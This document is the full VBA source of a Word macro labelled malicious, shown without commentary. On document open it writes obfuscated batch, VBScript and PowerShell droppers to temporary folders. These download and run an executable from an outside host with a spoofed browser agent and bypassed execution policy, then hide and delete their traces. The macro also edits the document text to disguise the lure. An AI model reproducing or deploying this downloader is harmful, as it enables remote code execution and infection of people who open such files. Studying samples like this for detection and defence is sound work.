Malicious Word macro

1. Attribute VB_Name = "ThisDocument"
2. Attribute VB_Base = "1Normal.ThisDocument"
3. Attribute VB_GlobalNameSpace = False
4. Attribute VB_Creatable = False
5. Attribute VB_PredeclaredId = True
6. Attribute VB_Exposed = True
7. Attribute VB_TemplateDerived = True
8. Attribute VB_Customizable = True
9. Sub Auto_Open()
10.     h
11. End Sub
12. Sub h()
13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
14.      USER = Environ("username")
15.      
16.      PST1 = "adobeacd-update." + "p" + Chr(115) + "1"
17.      BART = "adobeacd-update.b" + Chr(Asc(Chr(Asc("a")))) + Chr(Asc("t"))
18.      ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
19.      VBT1 = "adobeacd-update." + Chr(118) + "bs"
20.      VBTXP = "adobeacd-updatexp." + "v" + Chr(Asc("b")) + "s"
21.      
22.      
23.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
24.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
25.      MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
26.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
27.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
28.      XPBARTFILEDIR = "c:\Windows\Temp\" + BART
29.      
30.       On Error Resume Next
31.      SetAttr MY_FILENDIR, vbNormal
32.      
33.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
34.       Kill MY_FILENDIR
35.      End If
36.      
37.      On Error Resume Next
38.      SetAttr MY_FILEDIR, vbNormal
39.      If (Dir(MY_FILEDIR) <> "") Then
40.       Kill MY_FILEDIR
41.      End If
42.      
43.      On Error Resume Next
44.      SetAttr MY_FILDIR, vbNormal
45.      If (Dir(MY_FILDIR) <> "") Then
46.       Kill MY_FILDIR
47.      End If
48.      
49.      On Error Resume Next
50.      SetAttr XPFILEDIR, vbNormal
51.      If (Dir(XPFILEDIR) <> "") Then
52.       Kill XPFILEDIR
53.      End If
54.      
55.      Dim FileNumber As Integer
56.      Dim FileNumb As Integer
57.      Dim FileNu As Integer
58.      Dim mttt As Integer
59.      Dim retVal As Variant
60.      'Dim winver As Integer
61.     FileNumber = FreeFile
62.      FileNumb = FreeFile
63.      FileNu = FreeFile
64.      
65.      Dim objWMIService As Variant
66.     Dim colOperatingSystems As Variant
67.     Dim objOperatingSystem As Variant
68.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
69.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
70.     For Each objOperatingSystem In colOperatingSystems
71.         SysReport = SysReport & "The operating system on this computer is " & _
72.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
73.     Next
74.      
75.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
76.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
77.      For Each objOperatingSystem In colOperatingSystems
78.         winverstr = objOperatingSystem.Version
79.     Next
80.    
81.    
82.     winver = Val(winverstr)
83.     WaitFor (1)
84.      
85. If (winver <= 5.5) Then
86.      Open XPBARTFILEDIR For Output As #FileNu
87.      Print #FileNu, "@echo off"
88.      Print #FileNu, "ping 1.1.2.2 -n 2"
89.      Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
90.      Print #FileNu, "ping 1.1.2.2 -n 2"
91.      Print #FileNu, "c:\Windows\Temp\444.exe"
92.      Print #FileNu, ":loop"
93.      Print #FileNu, "ping 1.1.2.2 -n 1"
94.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
95.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
96.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
97.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
98.      Print #FileNu, "exit"
99.      Close #FileNu
100.      WaitFor (2)
101.      mttt = 88
102.  
103.      Open XPFILEDIR For Output As #FileNumber
104.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.2fs.com.au/tmp/rkn" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
105.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
106.      
107.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
108.      'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
109.    
110.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
111.      
112.      Print #FileNumber, "objXMLHTTP.send() "
113.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
114.      
115.      Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
116.      
117.      Print #FileNumber, "objADOStream.Open "
118.      Print #FileNumber, "objADOStream.Type = 1"
119.      Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
120.      Print #FileNumber, "objADOStream.Position = 0 "
121.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
122.      Print #FileNumber, "objADOStream.Close "
123.      Print #FileNumber, "Set objADOStream = Nothing "
124.      Print #FileNumber, "End if "
125.      Print #FileNumber, "Set objXMLHTTP = Nothing"
126.      Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
127.      Close #FileNumber
128.      
129.      WaitFor (1)
130.      
131.      retVal = Shell(XPBARTFILEDIR, 0)
132.      
133.      
134. End If
135.      
136.      
137. If (winver > 5.5) Then
138.      Open MY_FILENDIR For Output As #FileNumber
139.      Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
140.      Print #FileNumber, "$url  = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://www.2fs.com.au/tmp/rk" & "n.e" & "x" + "e';"
141.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
142.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
143.      Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
144.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
145.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
146.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
147.      Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
148.      Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
149.      Print #FileNumber, "Start-Sleep -s 15;"
150.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
151.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
152.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
153.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
154.      Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
155.      Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
156.      Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
157.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
158.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
159.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
160.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
161.      Close #FileNumber
162.    
163.     Open MY_FILDIR For Output As #FileNumb
164.     Print #FileNumb, "Dim dff"
165.     Print #FileNumb, "dff = 68"
166.     Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
167.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
168.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
169.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
170.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
171.     Close #FileNumb
172.    
173.     Open MY_FILEDIR For Output As #FileNu
174.     Print #FileNu, "@echo off"
175.     Print #FileNu, "ping 1.1.2.2 -n 2"
176.     Print #FileNu, "chcp 1251"
177.     Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
178.     Print #FileNu, "exit"
179.     Close #FileNu
180.        
181.     SetAttr MY_FILENDIR, vbNormal
182.     SetAttr MY_FILEDIR, vbNormal
183.     SetAttr MY_FILDIR, vbNormal
184.      
185.     WaitFor (1)
186.    
187.     retVal = Shell(MY_FILEDIR, 0)
188. End If
189.      
190.      findTest
191.     secondTest
192.     For Each myStoryRange In ActiveDocument.StoryRanges
193.     With myStoryRange.Find
194.         .Text = "<" & "sel" & "ect>"
195.         .Replacement.Text = " "
196.         .Wrap = wdFindContinue
197.         .Execute Replace:=wdReplaceAll
198.     End With
199.     Next myStoryRange
200.  
201.     For Each myStoryRange In ActiveDocument.StoryRanges
202.     With myStoryRange.Find
203.         .Text = "</s" & "ele" & "ct>"
204.         .Replacement.Text = " "
205.         .Wrap = wdFindContinue
206.         .Execute Replace:=wdReplaceAll
207.     End With
208.     Next myStoryRange
209.    
210.     For Each myStoryRange In ActiveDocument.StoryRanges
211.     With myStoryRange.Find
212.         .Text = "<" & "in" & "box>"
213.         .Replacement.Text = " "
214.         .Wrap = wdFindContinue
215.         .Execute Replace:=wdReplaceAll
216.     End With
217.     Next myStoryRange
218.  
219.     For Each myStoryRange In ActiveDocument.StoryRanges
220.     With myStoryRange.Find
221.         .Text = "</" & "in" & "box>"
222.         .Replacement.Text = " "
223.         .Wrap = wdFindContinue
224.         .Execute Replace:=wdReplaceAll
225.     End With
226.     Next myStoryRange
227.      
228.  
229. End Sub
230. Sub WaitFor(NumOfSeconds As Long)
231. Dim SngSec As Long
232. SngSec = Timer + NumOfSeconds
233.  
234. Do While Timer < SngSec
235. DoEvents
236. Loop
237.  
238. End Sub
239.  
240. Sub AutoOpen()
241.     Auto_Open
242. End Sub
243. Sub Workbook_Open()
244.     Auto_Open
245. End Sub
246. Sub findTest()
247. Dim firstTerm As String
248. Dim secondTerm As String
249. Dim rrtt As Range
250. Dim selRange As Range
251. Dim selectedText As String
252.  
253. Set rrtt = ActiveDocument.Range
254. firstTerm = "<se" & "lect>"
255. secondTerm = "</sel" & "ect>"
256. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
257. With rrtt.Find
258. .Text = firstTerm
259. .MatchWholeWord = True
260. .Execute
261. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
262. rrtt.Collapse direction:=wdCollapseEnd
263. Set selRange = ActiveDocument.Range
264. selRange.Start = rrtt.End
265. .Text = secondTerm
266. .MatchWholeWord = True
267. .Execute
268. ASKSASADW = "asjldklas"
269. rrtt.Collapse direction:=wdCollapseStart
270. selRange.End = rrtt.Start
271. selectedText = selRange.Delete
272. End With
273. End Sub
274.  
275. Sub secondTest()
276. Dim firstTerm As String
277. Dim secondTerm As String
278. Dim myRanget As Range
279. Dim yytt As Range
280. Dim selRanget As Range
281. Dim selectedTextt As String
282.  
283. Set yytt = ActiveDocument.Range
284. firstTerm = "<in" & "box>"
285. secondTerm = "</in" & "box>"
286. ASKIEJSASAHBDJ = "ask as8d j asdasl;a skdjasdnkjh12kh1 sad"
287. With yytt.Find
288. .Text = firstTerm
289. .MatchWholeWord = True
290. .Execute
291. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
292. yytt.Collapse direction:=wdCollapseEnd
293. ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a skdjasdnkjh12kh1 sad"
294. Set selRanget = ActiveDocument.Range
295. selRanget.Start = yytt.End
296. .Text = secondTerm
297. .MatchWholeWord = True
298. .Execute
299. ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a skdjasdnkjh12kh1 sad"
300. yytt.Collapse direction:=wdCollapseStart
301. selRanget.End = yytt.Start
302. selectedTextt = selRanget
303. selRanget.Font.Color = wdColorBlack
304. End With
305. End Sub